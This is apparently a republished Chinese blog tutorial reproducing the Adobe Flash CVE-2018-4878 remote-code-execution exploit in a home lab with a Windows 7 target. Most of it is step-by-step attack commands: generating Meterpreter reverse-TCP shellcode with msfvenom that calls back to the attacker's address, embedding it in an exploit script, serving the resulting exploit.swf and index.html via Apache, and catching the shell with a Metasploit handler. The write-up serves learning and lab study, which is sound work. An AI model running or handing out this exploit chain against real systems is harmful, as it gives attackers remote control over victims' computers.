cve-2018-4878漏洞復現


CVE-2018-4878
Flash 0day漏洞1、漏洞概述
2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會被“遠程代碼執行”,並且直接被getshell。

 

靶機:Windows7 sp1

條件:Adobe Flash 28.0.0.137及其之前的版本     IE8瀏覽器及以前版本(IE9好像也行)

所需工具已上傳

kali:192.168.43.16

(需要輸入的命令均用<>標記出來,<>不需要輸入)

准備工作:

kali中打開終端,找到下載的cve-2018-4878工具,切換到該路徑(這種工具在未來應該盡量由自己寫出來)

<msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt>

生成shellcode.txt可以查看kali的shellcode

<cat shellcode.txt>查看shellcode,並替換cve-2018-4878里面原來的shellcode

打開cve-2018-4878.py,並根據圖中指示修改

好了,改完之后在cve-2018-4878(下載的工具文件夾路徑中)

<python cve-2018-4878.py>生成要用的exploit.swf和index.html

<ls>發現已經生成了exploit.swf和index.html兩個文件

現在,我們要開啟apache2服務,把兩個文件復制到apache web路徑中

<service apache2 start>

<cp index.html /var/www/html/index.html>

<cp exploit.swf /var/www/html/exploit.swf>

打開msfconsole

<msfconsole>

使用監聽模塊

<use multi/handler>

加載一枚payload

<set payload windows/meterpreter/reverse_tcp>

使用

<show options>查看需要設置的參數

萬事具備,

<exploit>

現在,當靶機使用有cve-2018-4878漏洞的瀏覽器和Adobe Flash訪問http://192.168.43.16/index.html時,就會獲得靶機shell

可以看到,已經反彈meterpreter會話,只要輸入<shell>就可以拿到shell

通過此次漏洞復習可以更加深刻的了解到,當我們訪問一個網頁時,其實是訪問的一台電腦的某個文件,如果網頁存在sql注入,可以通過sql注入來登陸網站后台,並通過進一步操作可以獲取提供文件的電腦(服務器)的shell,這個以后再說吧


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM